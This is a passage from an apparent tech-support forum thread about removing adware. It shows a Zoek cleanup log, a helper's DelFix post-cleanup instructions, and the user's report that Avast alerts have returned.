HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skype deleted successfully

==== Empty IE Cache ======================

C:\Users\home\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Temp\1467f0\home\appdata\local\microsoft\windows\temporary internet files\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Temp\17b31ca0ca\home\appdata\local\microsoft\windows\temporary internet files\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Temp\2a89ee693\home\appdata\local\microsoft\windows\temporary internet files\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Temp\77d11180\home\appdata\local\microsoft\windows\temporary internet files\Content.IE5 emptied successfully
C:\Users\Remote\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully

==== Empty FireFox Cache ======================

No FireFox Cache found

==== Empty Chrome Cache ======================

C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
C:\Users\home\AppData\Local\Torch\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== C:\zoek_backup content ======================

C:\zoek_backup (files=12556 folders=192 647356047 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\Temp emptied successfully
C:\Users\Default User\AppData\Local\Temp emptied successfully
C:\Users\home\AppData\Local\Temp will be emptied at reboot
C:\Users\Remote\AppData\Local\Temp emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp will be emptied at reboot
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\Windows\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied
C:\Users\home\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:$RECYCLE.BIN successfully emptied

==== EOF on 22/06/2015 at 13:37:21.79 ======================

Excellent. A lot of malware is behind us, how is your PC behaving?

So far so good. Avast hasn’t pinged once since running Zoek. Do you reckon it has all been sorted? Was it all just one instance of malware or was there more than one?

Many thanks for all your help, TwinheadedEagle. You’re a legend :slight_smile:

There were multiple Adware infections, nothing too serious. Yes, it is sorted.

Cheers :slight_smile:

Post-cleanup procedures:

Download DelFix by Xplode and save it to your desktop.

[*]Run the tool by right click on the
http://www.imgdumper.nl/uploads6/51a5ce45267c1/51a5ce45263de-delfix.png
icon and Run as administrator option.
[*]Make sure that these ones are checked:

[]Remove disinfection tools
[
]Purge system restore
[*]Reset system settings

[*]Push Run and wait until the tool completes his work.
All tools we used should be gone. Tool will create an report for you (C:[B]DelFix.txt)

The tool will also record healthy state of registry and make a backup using ERUNT program in %windir%\ERUNT\DelFix
Tool deletes old system restore points and create a fresh system restore point after cleaning.

Thanks for your help. I wouldn’t have had a clue. You’ve been amazing :slight_smile:

Hi everyone, after a day of calm. This is back with a vengeance. Avast is pinging like mad. Is there anything you can suggest to eradicate the problem once and for all? Many thanks :slight_smile: